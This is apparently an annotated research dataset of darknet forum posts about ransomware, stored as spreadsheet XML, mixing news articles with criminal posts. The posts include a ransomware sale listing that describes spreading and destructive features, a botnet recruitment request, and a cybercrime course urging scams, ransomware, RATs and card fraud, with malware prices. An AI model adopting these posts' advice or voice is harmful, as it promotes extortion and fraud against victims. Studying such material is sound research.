    <t>darkside is the one who claimed it in the news. looks like they went down shortly after, though. gone to ground after the massive publicity, probably swapping identities and all that opsec stuff. as for why they chose bitcoin, it is easiest to move immediately, i would guess, while also being the easiest for big corporations to purchase rapidly and transfer. then one of the most simple to clean. transfer from bitcoin to xmr and the chain is broken.</t>
  </si>
  <si>
    <t>17/05/2021 01:53</t>
  </si>
  <si>
    <t>1 days 08:52:00</t>
  </si>
  <si>
    <t>the united states and other g7 countries have expressed their commitment to partner in fighting the global ransomware problem;;;;http://tape6m4x7swc7lwx2n2wtyccu4lt2qyahgwinx563gqfzeedn5nb4gid.onion/g7-countries-vow-to-fight-the-global-ransomware-scourge</t>
  </si>
  <si>
    <t>Post sharing information that countries vow to partner to fight ransomware</t>
  </si>
  <si>
    <t>29/06/2021 23:33</t>
  </si>
  <si>
    <t>1bba283f37f8d6d6492a</t>
  </si>
  <si>
    <t>General News G7 Countries Vow To Fight the Global Ransomware Scourge</t>
  </si>
  <si>
    <t>hi,;i am a former ransomware dev and i'm currently looking to broaden my horizens and focus on other types of malware to make some extra money in the next few months. my plan is to build a botnet for adware and then rent it out to others for their own distribution purposes (i already have some clients in mind).;;i have decent experience in c/c++, go, rust, java, and php. i have worked on web development projects in the past, including a few dn sites. i understand the basics of malware (opsec, development, encryption, distribution, etc). what i need is knowledge in c&amp;c and establishing persistence.;;does anyone have any resources or guides when it comes to botnets specifically?;thanks.;;also if you happen to be interested in joining this project, pm me. i could definitely use a few helping hands</t>
  </si>
  <si>
    <t>previous ransowmare dev shifting to botnets</t>
  </si>
  <si>
    <t>/u/caesr</t>
  </si>
  <si>
    <t>17/05/2022 07:29</t>
  </si>
  <si>
    <t>9d8f238ab2701ed561d0</t>
  </si>
  <si>
    <t>Getting started with botnets?</t>
  </si>
  <si>
    <t>2 days 13:46:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the global crime gang behind the cyber attack on the hse has published details of invoices on the darknet, we can reveal. it comes after the hackers handed over decryption keys to unlock hse servers without the state paying ransom.;;sources claim the cyber mob have come under political pressure from russia after putting lives at risk by crippling the irish health service. furious justice minister heather humphreys claimed the hackers had ���no regard for human life��� as she urged anyone who is contacted by someone claiming to have their ��medical data to call the gardai.;;we can reveal that information relating to a number of financial transactions involving the hse were posted on the darknet by ���wizard spider��� earlier this week. and although the hackers have provided a decryption key and codes to the hse, which may help it restore its it systems, they still ��possess the stolen data.;;they have threatened to start posting private medicalirish sun today reveals details of the exchanges between the organised cyber group and the hse.;;;gang messages;;in one message last week, they again demanded a ransom.;;they said: ���as you already know we have infiltrated your network and stayed for more than two weeks ��� enough to study all your documentation, encrypted your file servers, downloaded all important information, personal data with partners, home addresses and phone numbers. ���there are also employees ��contracts, employees home addresses, scans of personal documents with partners and bank statements.;;���the good news is that we are businessmen. we want to receive ransom for everything that needs to be kept secret and don���t want to ruin your business.��� when pressing for the ransom, they said: ���when do you expect to proceed with the payment?;;���in the event we do not reach a consensus we will start publishing and selling your private information very soon. are you still with us? we w��we are providing the decryption tool to your network for free. but you should understand that we will sell or publish a lot of private data if you will not contact us and try to resolve the situation.���;;;'value still in data';;a senior hse source yesterday told the irish sun: ���they may have ��provided a decryption tool but the value is still in the data that they have already stolen.;;���they have already released some material on the darknet and they have shown they can do this quite easily. there is a feeling that some ��political pressure has been placed on them from russia because they have attacked cancer patients and that���s why the decryption keys were released.;;���if they put the medical records of individual patients on the darknet then the concern is that other ��professional fraudsters could use this for criminal enterprises. ���the hackers are still trying to get the hse to engage with regards to the ransom. the priority at the moment is to get the hse���s system up and running again.���;;acting justice minister humphreys said the criminals who breached the hse���s computers have caused ���untold chaos��� in the health system. she said the national cyber ��security centre and the gardai are working in tandem with the fbi and interpol to investigate ���all avenues���.;;;'untold chaos';;minister humphreys said: ���i cannot say who it is. we don���t know. but what we do know is that they are ��criminals. they have no regard for human life. ���they don���t care that they have caused untold chaos in our health service. ���and you have to ��consider this is ��following on from a very difficult year we���ve all had in terms of covid.���;;last night, taoiseach micheal martin revealed that it will take ���weeks��� to rebuild the it systems and retrieve data following the crippling cyber attack. he said: ���certainly the decryption key, getting that is good but in itself it doesn���t really taeekend they will continue to assess the application of this decryption tool or key and right through that the objection is to get services back, to get data back and build it back stronger and better for the future. so it���s slow work but some systems are back up.;;���some voluntary hospitals are now operating, in particular scans are back in certain hospitals. ���so progress is being made so we���re asking the public to bear with us and bear with the health service in particular as they deal with this unprecedented attack.���;;;no ransom;;and the taoiseach confirmed that no ransom had been paid by the state following the attack and ��security experts still don���t know why the cyber criminals handed over the decryption keys. health minister stephen donnelly earlier said it ���came as a surprise��� to the government. he added there could be ���any number of reasons��� for them to offer it up and it would not be useful for him to speculate.;;minihe key will help get back the hse���s info. but he added: ���obviously it���s a detailed technical piece of work and we need to be absolutely sure this will help restore the health systems rather than potentially cause further harm.���;;minister donnelly said some of the most crucial it systems were back up and running at a local level in some hospitals ��� including imaging software for radiology and some patient administration systems. but he said radiation oncology remained a problem and the ��restoration of these services is an ���absolute priority��� for the hse.;;the wicklow td also told rte the government was taking the hackers��� threat to upload data online ���very seriously���. and the taoiseach said the ��government is now working with all large social media firms to ensure any data from the attack that���s posted online is immediately taken down again.;;;impact felt for weeks;;on thursday, hse boss paul reid described the nims.;;he said the ���callous act��� was an attack on health staff who���ve been working ���relentlessly��� during the pandemic. meanwhile cyber risk international ceo paul dwyer told newstalk yesterday that this attack has annoyed many in the hacking world.;;he added: ���the reason behind the key being released may be not for ransom payment. it may be in fact that the cyber criminal community itself are really, really annoyed at this ��particular kind of attack. ���they have been pulling in ��hundreds of millions of ransomware attacks against harder targets ��� oil pipelines, large banks.;;���and this attack has caused a problem with their business model, because now the world is looking at this ��� the world is getting more prepared for ransomware attacks.��� last night, gardai urg</t>
  </si>
  <si>
    <t>news article dicussing the HSE cyber attack and that the responsable gang has published data on the darkweb</t>
  </si>
  <si>
    <t>23/05/2021 19:58</t>
  </si>
  <si>
    <t>ef298a03842d8958a214</t>
  </si>
  <si>
    <t>Global Gang Behind HSE Cyber Attack Publishes Details of Invoices on Darknet and Threaten to Post Medical Info on Monday</t>
  </si>
  <si>
    <t>0 days 00:24:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the biden administration has promised to bolster defenses against attacks, improve efforts to prosecute those responsible and build diplomatic alliances.;;;source:;khou 11;;foreign keyboard criminals with scant fear of repercussions have paralyzed u.s. schools and hospitals, leaked highly sensitive police files, triggered fuel shortages and, most recently, threatened global food supply chains.;;the escalating havoc  caused by ransomware gangs raises an obvious question: why has the united states, believed to have the world's greatest cyber capabilities, looked so powerless to protect its citizens from these kind of criminals operating with near impunity out of russia and allied countries?;;the answer is that there are numerous technological, legal and diplomatic hurdles to going after ransomware gangs. until recently, it just hasn't been a high priority for the u.s. government.;;that has changed as the problem has grown well beyond an economic nuisance. president joe biden intends to confront russia's leader, vladimir putin, about moscow's harboring of ransomware criminals when the two men meet in europe later this month. the biden administration has also promised to boost defenses against attacks, improve efforts to prosecute those responsible and build diplomatic alliances to pressure countries that harbor ransomware gangs.;;calls are growing for the administration to direct u.s. intelligence agencies and the military to attack ransomware gangs' technical infrastructure used for hacking, posting sensitive victim data on the dark web and storing digital currency payouts.;;fighting ransomware requires the nonlethal equivalent of the "global war on terrorism" launched after the sept. 11 attacks, said john riggi, a former fbi agent and senior adviser for cybersecurity and risk for the america hospital association. its members have been hard hit by ransomware gangs during the coronavirus pandemic.;;"it should include a combination of diplomatic, financial, law enforcement, intelligence operations, of course, and military operations," riggi said.;;a public-private task force including microsoft and amazon made similar suggestions in an 81-page report that called for intelligence agencies and the pentagon's u.s. cyber command to work with other agencies to "prioritize ransomware disruption operations.";;"take their infrastructure away, go after their wallets, their ability to cash out," said philip reiner, a lead author of the report. he worked at the national security council during the obama presidency and is now ceo at the institute for security and technology.;;but the difficulties of taking down ransomware gangs and other cybercriminals have long been clear. the fbi's list of most-wanted cyber fugitives has grown at a rapid clip and now has more than 100 entries, many of whom are not exactly hiding. evgeniy bogachev, indicted nearly a decade ago for what prosecutors say was a wave of cyber bank thefts, lives in a russian resort town and "is known to enjoy boating" on the black sea, according to the fbi's wanted listing.;;ransomware gangs can move around, do not need much infrastructure to operate and can shield their identities. they also operate in a decentralized network. for instance, darkside, the group responsible for the colonial pipeline attack that led to fuel shortages in the south, rents out its ransomware software to partners to carry out attacks.;;katie nickels, director of intelligence at the cybersecurity firm red canary, said identifying and disrupting ransomware criminals takes time and serious effort.;;"a lot of people misunderstand that the government can't just willy-nilly go out and press a button and say, well, nuke that computer," she said. "trying to attribute to a person in cyberspace is not an easy task, even for intelligence communities.";;reiner said those limits do not mean the united states cannot still make progress against defeating ransomware, comparing it with america's ability to degrade the terrorist group al-qaida while not capturing its leader, ayman al-zawahiri, who took over after u.s. troops killed osama bin laden.;;"we can fairly easily make the argument that al-qaida no longer poses a threat to the homeland," reiner said. "so short of getting al-zawahiri, you destroy his ability to actually operate. that's what you can do to these (ransomware) guys.";;the white house has been vague about whether it plans to use offensive cyber measures against ransomware gangs. press secretary jen psaki said wednesday that "we're not going to take options off the table," but she did not elaborate. her comments followed a ransomware attack by a russian gang that caused outages at brazil's jbs sa, the second-largest producer of beef, pork and chicken in the united states.;;gen. paul nakasone, who leads u.s. cyber command and the national security agency, said at a recent symposium that he believes the u.s. will be "bringing the weight of our nation," including the defense department, "to take down this (ransomware) infrastructure outside the united states.";;sen. angus king, an independent from maine who is a legislative leader on cybersecurity issues, said the debate in congress over how aggressive the u.s. needs to be against ransomware gangs, as well as state adversaries, will be "front and center of the next month or two.";;"to be honest, it's complicated because you're talking about using government agencies, government capabilities to go after private citizens in another country," he said.;;the u.s. is widely believed to have the best offensive cyber capabilities in the world, though details about such highly classified activities are scant. documents leaked by former nsa contractor edward snowden show the u.s. conducted 231 offensive cyber operations in 2011. more than a decade ago a virus called stuxnet attacked control units for centrifuges in an underground site in iran, causing the sensitive devices to spin out of control and destroy themselves. the cyberattack was attributed to america and israel.;;u.s. policy called "persistent engagement" already authorizes cyberwarriors to engage hostile hackers in cyberspace and disrupt their operations with code. u.s. cyber command has launched offensive operations related to election security, including against russian misinformation officials during u.s. midterm elections in 2018.;;after the colonial pipeline attack, biden promised that his administration was committed to bringing foreign cybercriminals to justice. yet even as he was speaking from the white house, a different russian-linked ransomware gang was leaking thousands of highly sensitive internal files ��� including deeply personal background checks ��� belonging to the police department  in the nation's capital. experts believe it's the worst ransomware attack against a u.s.-based law enforcemen"we are not afraid of anyone,";the hackers wrote in a follow-up post.</t>
  </si>
  <si>
    <t>news article discussing the hurdles that the US faces when confrunting ransomware</t>
  </si>
  <si>
    <t>d795fd47671002818862</t>
  </si>
  <si>
    <t>Global War on Ransomware? Hurdles Hinder US Response</t>
  </si>
  <si>
    <t>{'ransomware': 16}</t>
  </si>
  <si>
    <t>private ransomware for sale. thinking of setting up empire market vendor account if there is general interest. let me know what you think!;;general characteristics:;;--coded in c# .net framework 3.5.;--over 10,000 lines of code;--many classes build from the ground up.;--extensive and fully explained configuration file.;--size around 5 mb.;--over 100 skins provided.;--advanced spreading features;--rootkit to hide executable included and automatic.;--debug testing safe sample mode.;--extensively tested.;--runs from win7 and up.;--low cpu usage. all functions use multi threading.;--simulates system process.;--melting and relocation.;--extensive punishment if ransom not paid - goes up to all hard drives deletion and killing boot.;--attacker regularly informed of ransomware actions.;;interface:;;--windows frame and icon in windows taskbar are invisible, however you can still drag around the ransomware main window with the mouse to clear the browser visibility to make the payment.;--instructions have background transparency.;--copy to clipboard bitcoin address button.;--links to both bitcoin technology explanation and payment website address.;--cool wallpaper changer (loads wallpaper file from a selected url.;--market btc value is shown in real time in main interface.;--a skinned system is used to easily change the malware main interface look and feel.;;payment system:;;--totally automated using block.io accounts.;--you don't need to risk by giving any email address.;--no attacker intervention.;--each victim gets an individual unique btc address.;;security features:;;--the ransomware disables the task manager (it is restored after payment) to prevent being killed from memory.;--the ransomware also sets itself as an un-killable process. in case the user manages to kill it, the whole windows will crash with a bsod.;--all needed dll files are deployed by the malware itself. no need for external files.;--usb stick, network drives, network cards spreading.;--intranet spreading by lateral movement and wmi exploits.;--spreading through html email attachment and fud word macro.;--autorun enabler for removable devices.;--eternalblue exploit scanner and spreading. doublepulsar report and spreading.;--windows defender is disabled. can't be turned back on easily and it will stay off after restart.;--bot killer.;--windows explorer options modified so hidden files can not be seen (might not always work depending on os version or may require restart).;--anti sniffers code.;--windows update disabler.;--system restore killer.;--disable uac (no admin for victim).;--disable regedit.;--disable cmd.;--windows serial number retrieval. send back to attacker by email.;--use the app as ransomware or as worm. option to not encrypt any file and not request any ransom, only spread through different mechanisms and install rat or any other file of choice.;--change permissions of all files belonging to all the users in a intranet so they can be all encrypted.;--businesses and enterprises databases encryption.;--anti virustotal and virusscan.;--admin configurable user account is created in victim's computer, thereby if attacker has access to that network then he can login as admin (logged victim has to be admin in the first place).;--clean-up after ransom is paid.;--bluekeep vulnerability scanner. results are sent back to attacker by email.;--custom smtp server can be easily set.;--you can add wallets of other coins different than btc.;--wallets are handled intelligently. once one wallet runs out of new addresses, the next one is used.;--mass mailer. it works with a list of free smtp servers and a list of email addresses combined used to send an infected email copy of itself.;--random domain generation. rdg is a great technique to avoid your malware communication channel being taken down. it will generate hundreds of domains a day with which it will simulate to contact. immerse in this big lot of communications traffic your real channel of communication will be disguised. only one or two of these random domains is really registered and used by the malware, the rest are decoys. can be turned on or off and you can select how many visits/day to random domains it will perform.;--encryption of files up to 1000 mb in size.;--encryption password option to make it static or dynamic. in dynamic mode, the custom decryptor (provided) is no longer effective and each new computer will have a different encryption password.;--dynamic ransom amount. if set to yes, the ransom will increase progressively each certain pre-configured number of hours and in certain pre-configured percentage. there is also a variable to set the maximum posible increase to prevent for excessively high ransom amounts.;--variable purge time interval cycle. this variable allows you to set a variable time cycle after which files are erased.;--possibility to configure in config,cs if a large number of files is erased or not if malware is restarted as punishment and how many files will be erased. erasing will only occur after malware has melted and is relocated to its final hidden directory.;--impossibility to erase malware directory or associated files. for this to work the malware has to be run elevated (so run elevated variable in config.cs has to be set to true), if not, it will ask for elevation; to prevent for such a situation, it will only try to protect the directories if it is running elevated in the first place.;--forensics evidence cleaner. something i always want to add but too much coding. finally its done. this feature can be configured and customized in config,cs. in case the victim is not willing to pay it will look up for all hard drives erasing any trace of its presence, killing every hard drive and finally removing itself.;--dynamic control email accounts. in case account is banned malware can chose from several others.;--uses tor technology for communications.;;i've got 13 more god malware but will start with this one and see how it goes. lmk what you think pls.</t>
  </si>
  <si>
    <t>post adverting ransomware</t>
  </si>
  <si>
    <t>/u/Trapezium</t>
  </si>
  <si>
    <t>762516627fc3473793db</t>
  </si>
  <si>
    <t>God Private Ransomware .NET C# Source Code Fully Featured. Anyone interested?</t>
  </si>
  <si>
    <t>38 days 07:07:00</t>
  </si>
  <si>
    <t>wow man, impressive.  id just like to see the code.  that thing sounds like a piece of art.  nice work.</t>
  </si>
  <si>
    <t>post praising raas post</t>
  </si>
  <si>
    <t>/u/zerodazed</t>
  </si>
  <si>
    <t>0 days 00:47:00</t>
  </si>
  <si>
    <t>if this is as good as you say, why aren't you just holding all the big corporations to ransom and pocketing huge amounts?</t>
  </si>
  <si>
    <t>post skeptical as to it's success rate due to it being posted on dread vs a more specialised ransomware forum (i.e exploit)</t>
  </si>
  <si>
    <t>/u/swordfish</t>
  </si>
  <si>
    <t>this post makes no sense, why the fuck in dread. 80 % of the dread users are stupid. try to post this in hackforums.net/exploit.in/cracked.to and maybe torum forum. that are the places were are more experienced hackers. instead of dread where the people are crying about 30$ dispute been frozen on empire.</t>
  </si>
  <si>
    <t>pm me, very interested</t>
  </si>
  <si>
    <t>/u/The-SS-Naomi</t>
  </si>
  <si>
    <t>38 days 04:10:00</t>
  </si>
  <si>
    <t>this is a site i frequent often. it gives you good visualization as to 'what happened'.;;;data breaches must be reported.;so the content is always current.;;almost note that 'misconfiguration' means that 'we messed up'.;;it helps to see the usual two (2) industries that get affected.;;looking at the numbers of persons affected gives you a bigger picture view of just how far reaching a single data breach can be.;;if you visit this site often you will be surprised at how often data breaches take place and the details within. of course, on your own you can further investigate what happened.;;;since this is a governmental website use a clearnet browser:;;(this isn't the nsa so there is nothing special about this site/page.);;https://ocrportal.hhs.gov/ocr/breach/breach_report.jsf</t>
  </si>
  <si>
    <t>user providing a link which he states provides good visalisation on data breaches</t>
  </si>
  <si>
    <t>4d83510abf642b9ac6d3</t>
  </si>
  <si>
    <t>Good Visualization into Data Breaches</t>
  </si>
  <si>
    <t>3 days 17:07:00</t>
  </si>
  <si>
    <t>yeah they are disturbingly common, especially once ransomware started mass-exfiltrating data before encrypting it.  i tend to pay the most attention to leaks from financial institutions or govt offices because those are one of the few places that will reliably have a person's email, phone number, national id number, etc.  companies have plenty of shady shit they do before reporting (sellling off stock) or just paying some ransomware actor extra to let them avoid any public disclosure and probable drop in stock price.;;unfortunately a lot of the cybersecurity industry is content to do very vague and extremely incomplete audits, and often governments don't pay for any serious creative pentesting on their civilian systems.  sad state of affairs :(</t>
  </si>
  <si>
    <t>user agreeing with the previous post with an addition that they focus on breaches from goverment/financial insitutitions</t>
  </si>
  <si>
    <t>0 days 14:22:00</t>
  </si>
  <si>
    <t>let's spread a fucking ransomware through the entire globe, we'll get out of this town i can assure you, let me finish my coffee</t>
  </si>
  <si>
    <t>user stating desire to spead a ransomware throughout the globe</t>
  </si>
  <si>
    <t>/u/ArthurM0rgan</t>
  </si>
  <si>
    <t>18/11/2021 19:17</t>
  </si>
  <si>
    <t>158a0ed2ac9f389d0212</t>
  </si>
  <si>
    <t>Good morning everyone</t>
  </si>
  <si>
    <t>1 days 23:13:00</t>
  </si>
  <si>
    <t>ok. i'm not super interested in ransomwareing the globe but it would be nice for at least a change of pace. oh and hey when we make demands how about we do it in xmr and not btc like the dipshits a few months ago? when i heard it was a ransom to be paid in bitcoin i wondered why the dudes didn't just ask colonial to write them a check.;;i'll only let you finish your coffee if you assure me you brewed it at home and didn't waste hard earned money on some shitty suburban starbucks.;;then lets go!</t>
  </si>
  <si>
    <t>user discussing desire to spead a ransomware throughout the globe</t>
  </si>
  <si>
    <t>/u/immabunny</t>
  </si>
  <si>
    <t>20/11/2021 15:22</t>
  </si>
  <si>
    <t>1 days 18:55:00</t>
  </si>
  <si>
    <t>can someone give me a brief desc of what hacking field i should get into, the requirements and soforth.;and how much money i can make if i get really skilled</t>
  </si>
  <si>
    <t>User asking for information on the diffrent types of hacking fields</t>
  </si>
  <si>
    <t>7b71fd88f48fd4b1ce1f</t>
  </si>
  <si>
    <t>Guidance towards riches</t>
  </si>
  <si>
    <t>0 days 17:58:00</t>
  </si>
  <si>
    <t>i wanna get into low-teir ransomware and cash out quick, i was also thinking about sql?;does tryhackme have anything about sql?</t>
  </si>
  <si>
    <t>User asking for information about low tier ransomware</t>
  </si>
  <si>
    <t>0 days 17:00:00</t>
  </si>
  <si>
    <t>you can install ransomware when you find out. keep your emotions away while taking revenge.</t>
  </si>
  <si>
    <t>User recommending keeping emotions out of using ransomware</t>
  </si>
  <si>
    <t>/u/jasonblockchain</t>
  </si>
  <si>
    <t>23/04/2022 11:03</t>
  </si>
  <si>
    <t>5ccfd18eaaa4b25a7a98</t>
  </si>
  <si>
    <t>Guys I have been Blackmailed. Please help!</t>
  </si>
  <si>
    <t>2 days 20:51:00</t>
  </si>
  <si>
    <t>ok, i have another few questions. will you teach/ give any guidelines about the way to create a registered phone number anonymously? and i saw there are additional resources for sale upon becoming a student,  what is the range of the products' cost? i.e. if i want to purchase a ransomware, what does ransomware mainly cost in your private forum?</t>
  </si>
  <si>
    <t>User asking questions about what is contained in the Hacktown (education reasource) memberships</t>
  </si>
  <si>
    <t>/u/anonsiam</t>
  </si>
  <si>
    <t>21/10/2020 23:49</t>
  </si>
  <si>
    <t>/d/HackTown</t>
  </si>
  <si>
    <t>d0544e44a1877148524a</t>
  </si>
  <si>
    <t>HackTown Memberships and Reviews</t>
  </si>
  <si>
    <t>12 days 04:33:00</t>
  </si>
  <si>
    <t>718 days 10:09:00</t>
  </si>
  <si>
    <t>if you need a phone number anonymously then purchase a burner cell phone in cash in person. no need for guide on this :);;ransomware price varies if you're doing raas or purchasing private build. private build is $600/month and $3000 for full private build.;;proper malware is not cheap but all tools within hacktown are reputable and credible. all the tools in hacktown can be referenced to ensure best quality for members.</t>
  </si>
  <si>
    <t xml:space="preserve">Creator of hacktown answering questions asked. </t>
  </si>
  <si>
    <t>22/10/2020 18:48</t>
  </si>
  <si>
    <t>0 days 18:59:00</t>
  </si>
  <si>
    <t>hey funshine just check your site;i have 1 qustion;shall we join your forum and after that is it sure that we will make money after learn from course ?i am not rich so if i buy your membership i can't buy ransomeware did you give us ransomeware or some other usefull malware stuff if we buy your membership ?</t>
  </si>
  <si>
    <t>/u/Hack3er90</t>
  </si>
  <si>
    <t>17/12/2020 00:15</t>
  </si>
  <si>
    <t>11 days 03:30:00</t>
  </si>
  <si>
    <t>you'll learn everything from my expeirence and expertise as a cybercriminal and be able to apply the tactics, techniques, and procedures that i used to make money that are taught at hacktown so you generate your own profits, of course.;;however, certain tools, such as ransomware, are not supplied and you would need to purchase them from the latest and greatest malware devleopers which are supplied within the armory of hacktown.</t>
  </si>
  <si>
    <t>17/12/2020 03:59</t>
  </si>
  <si>
    <t>0 days 03:44:00</t>
  </si>
  <si>
    <t>hello funshine,;;i have read the free courses that you offer on hacktown and i am very impressed however i have a few questions that i would like to ask before purchasing a membership as i am interested. when will act v and act vi be released? is there ransomware, rats and other hacking software available to buy or at least links to reputable vendors as you know there are a lot of scams out there. is the private forum active and useful because i am positive i will have a lot of questions i would like to ask as i am new to hacking and will most likely require some sort of assistance at some point ?;;if you could get back to me as soon as possible that would be great :)</t>
  </si>
  <si>
    <t>/u/Anon829</t>
  </si>
  <si>
    <t>15 days 18:34:00</t>
  </si>
  <si>
    <t>everything taught at hacktown can still be applied today but it really comes down to you as a person and what you're going to be capable of doing. just because people are learning about how to commit xyz cybercrime doesn't necessarily mean they're going to go wild out there. some have but most won't. we all have different opportunities and different risks.;;i���ve heard really good stories and i���ve heard of absolute failures. each person is different.;;the point of hacktown is for others to learn from my experience as a cybercriminal and replicate what i was doing with the goal of profiting. you should have your hands in a lot of honey pots and stack that crypto waiting for the next crypto boom. especially right now.;;i had my hands in a lot of honey jars back then and i recommend everyone to dabble in everything and begin to generate some income per month and build from there.;;ideally you should be:;- running online scams.;- using ransomware.;- infecting people with rats (selling access to theccounts).;- performing online fraud (credit card and bank fraud).;- using every opportunity to generate profits online (passively if possible).;;the important part is to figure out what you���re good at and where you fall in the cybercriminal world. some people are really good at smooth talking their way around people and others are good at tricking people into downloading malware. it���s important you find where you excel and focus on that moving forward to advance those skills.;;hopefully the knowledge taught here can be applied to your life for your own fin</t>
  </si>
  <si>
    <t>27/02/2021 20:16</t>
  </si>
  <si>
    <t>0 days 01:04:00</t>
  </si>
  <si>
    <t>i took hacktown membership  2 months ago and i am giving a review from my side right now.;;;- who am i ?;i am cyberjagu you can find me on cryptbb as a staff member. (http://cryptbb2gezhohku.onion/member.php?action=profile&amp;uid=11927);;i know funshine hacktown from a year ago;and i decided to buy hacktown membership 2 months ago;and when i write this review  i  already read every chapter and act exist in hacktown;;many users think the hackdown is fake it's just a scam site and other users want to know how the hacktown actually look like ?;for those check it : http://hacktownpagdenbb.onion/instructions.html;;and believe there is nothing change;hacktown is same as shown;when you pay 125$ fees and send a mail to funshine it take 72 hr for received your credentials .;;when you login first time to hacktown you will see a forum for members where you can share your doubt s and questions to staff;;i am sharing the main component that is available at hacktown;;;forum;act 0;act i;act ii;act iii;act iv;act v;carding;armory;;act v is recently uploaded in hacktown;hacktown include every fucking details and knowledge that you want to become a successful cybercriminal;hacktown dont need any programming knowledge;you have 1 option armory;where you can buy crypter , ransomeware , remote access trojans (rat)  etc ......;;insort if you are new to hacking and want to learn hacking fast and make a good money;hactown is what you want;;if you are new to hacking and want to learn hacking fast and want to make good money;hack town is what you want;;act iii - how to compromise an individual or company with a malicious microsoft word document.;act iv - online scams and hidden services;act v -  phishfood</t>
  </si>
  <si>
    <t>User reviewing hacktown and providing praise</t>
  </si>
  <si>
    <t>23/03/2021 15:53</t>
  </si>
  <si>
    <t>5 days 17:07:00</t>
  </si>
  <si>
    <t>thanks for your review my friend! :)</t>
  </si>
  <si>
    <t>Hacktown creator thanking user for the review</t>
  </si>
  <si>
    <t>24/03/2021 18:34</t>
  </si>
  <si>
    <t>1 days 02:41:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a ransomware group that last week stole schematics from apple supplier quanta computer and threatened to release the trove of documents has mysteriously removed all references related to the extortion attempt from its dark web blog, macrumors can confirm.;;the ransomware group known as revil claimed last tuesday that it had accessed the internal computers of taiwan-based quanta and managed to obtain several images and schematics of unreleased apple products.;;bleepingcomputer reported that the group initially demanded quanta pay $50 million for recovery of the files. however, according to an april 20 statement posted on the hacker group's site, quanta refused to pay the ransom, which led the criminals to go after apple for the money instead.;;to prove it had hacked into quanta's servers and in order to turn up the pressure on apple, the hackers publicly posted a handful of images depicting unreleased product schematics, including details on apple's unreleased next-generation macbooks.;;the group threatened to publish new data every day leading up to may 1, unless apple paid the $50 million ransom demand in exchange for deleting the files.;;the extortion attempt was timed to coincide with apple's april 20 "spring loaded" digital event, where apple announced airtag item trackers, new ipad pro models, and new imacs. despite the threat, however, no additional stolen documents have been leaked online since the original demand was made public.;;historically, revil;isn't known for bluffing;and routinely posts stolen documents if its victims don't pay up, so it's unclear why the group has failed to follow through on this occasion, and apple has so far not commented on the breach. the group actively continues to extort other companies, so what has prompted it to remove all content linked to the quanta hack remains unknown.</t>
  </si>
  <si>
    <t>news article discussing how revil removed stolen information from Apple from their extortion website and why this may be the case</t>
  </si>
  <si>
    <t>28/04/2021 15:49</t>
  </si>
  <si>
    <t>ecbb86f44d726d4e090d</t>
  </si>
  <si>
    <t>Hacker Group Mysteriously Removes Stolen Apple Schematics and Extortion Threat From Ransomware Website</t>
  </si>
  <si>
    <t>0 days 04:49:00</t>
  </si>
  <si>
    <t>{'extortion': 2, 'revil': 1, 'ransomware': 2}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;ransomware attack may require a complete rebuild of rmow network. some services at the resort municipality of whistler (rmow) are beginning to come back online following a ransomware attack made public on april 27, but full recovery could take months, as documents posted to the dark web indicate the criminals had deep access to municipal systems.;;over the course of a week, the criminals posted various password-protected links ending in the names of different rmow employees (which they claim to have sold on the dark web), followed by an excel spreadsheet that included sensitive system administration info, and ultimately a data dump of ���important��� passwords.;;���primarily they seem to be looking to demonstrate to the municipality that they did indeed have deep access to their systems,��� said brett callow, threat analyst with emsisoft, a cyber security company with a particular expertise in ransomware.;;���gathering up the various credentialss of the network would obviously require them to access those parts of the network.��� having gained such pervasive access to the rmow���s systems, the problem will be ���very hard to remediate,��� callow added, and the rmow may be looking at a complete rebuild of its network.;;���that is absolutely the best solution���you rebuild your network,��� he said. ���if you don���t do that there is always a risk that you���ll miss a backdoor they���ve created.��� that process can cost millions of dollars and take months to complete, callow said, noting that, according to statistics, the average ransomware incident costs $8.1 million and takes 287 days to recover from.;;with an investigation ongoing, it���s still unclear how the criminals accessed the rmow���s systems, but it���s possible they exploited a ���zero-day��� vulnerability (an exploit previously unknown to the developer) found in sonicwall vpn, a service uslog post on april 29, noting that a patch was released to fix the problem in february. asked about the documents posted to the dark web, and if the rmow installed the sonicwall patch released in february, a spokesperson said the municipality cannot comment on specific details of the investigation while it is still underway.;;���we obviously can���t say that that was the entry point, but it���s certainly possible,��� callow said.  ���we can certainly say that ransomware groups do exploit vulnerabilities in vpn, including a zero-day that existed in sonicwall���s vpn, and that the municipality seem to have used sonicwall.���;;the rmow said in a may 11 update that its investigation ���has not found evidence��� that public or customer info has been compromised, and that it will reach out to affected individuals if that changes. the leaked documents pique viewed contained no definitive proof to the contrary.;;asked for his opinion, callow cast doubt on the rmowse to gain access to the network and obtain credentials that would have enabled them to access other areas of the network, why didn���t they and why didn���t they take data?��� he said.;;an rmow spokesper"the investigation has found evidence that employee personal information may have been accessed and out of an abundance of caution, we have offered credit monitoring for all current and past rmow employees. we have reached out to current staff and all past and current staff are also being contacted by mail.";;as for what type of market there would be for the rmow���s data, callow said, ���it would depend what " ���information about individuals could be used for identity theft. information about other organizations can be used to spear-phish them (phishing attempts targeted at individuals).;;���so there is a market, but how much of a market i really can���t say.���;;;no estimate for full return of services;;after learning of the attack on april 27, the rmow took all of its services offline as a precautionary measure. the municipality is also working with the rcmp and office of the information and privacy commissioner for b.c. on the matter.;;in a release issued may 11, the rmow noted there is still no estimate for when all services will return to normal, but ���a limited number of critical systems��� are expected to start to return within two weeks.;;���we apologize for this inconvenience to our community members and greatly appreciate everyone���s patience as we work diligently to bring these services back online,��� said chief administrative officer virginia cu rmow���s systems is our highest priority to protect the information that we maintain for our employees and community members. it is a painstaking and lengthy process to make sure that our systems are fully secured before we bring them back online. we are working with cyber security experts to further strengthen our security safeguards in the ever-evolving cyber security landscape.���;;once systems are back online, the rmow will work through applications and requests in the order they were received, the release said, adding that alternate service delivery methods have been put in place where possible.;;in-person service at municipal hall is still suspended, but all departments can be reached (find specific contact info, as well as rmow updates and a faq at whistler.ca). a call centre is available for the general public at 604-932-5535 from 8 a.m. to 4:30 p.m., monday to friday.;;though council meetings scheduled for may 4 were cancelled following the attack, a special council meeting was held may an amendment to the five-year financial plan and the rmow���s 2021 tax bylaws (both were given first three readings on april 20).;;a closed meeting was also held on may 11, to ���discuss the security of the property of the municipality, the receipt of advice that is subject to solicitor-client privilege, and discussions regarding the provision of a municipal service, and discussions with municipal officers and employees respecting municipal objectives, measures and progress reports for the purposes of preparing an annual report.���;;the next public 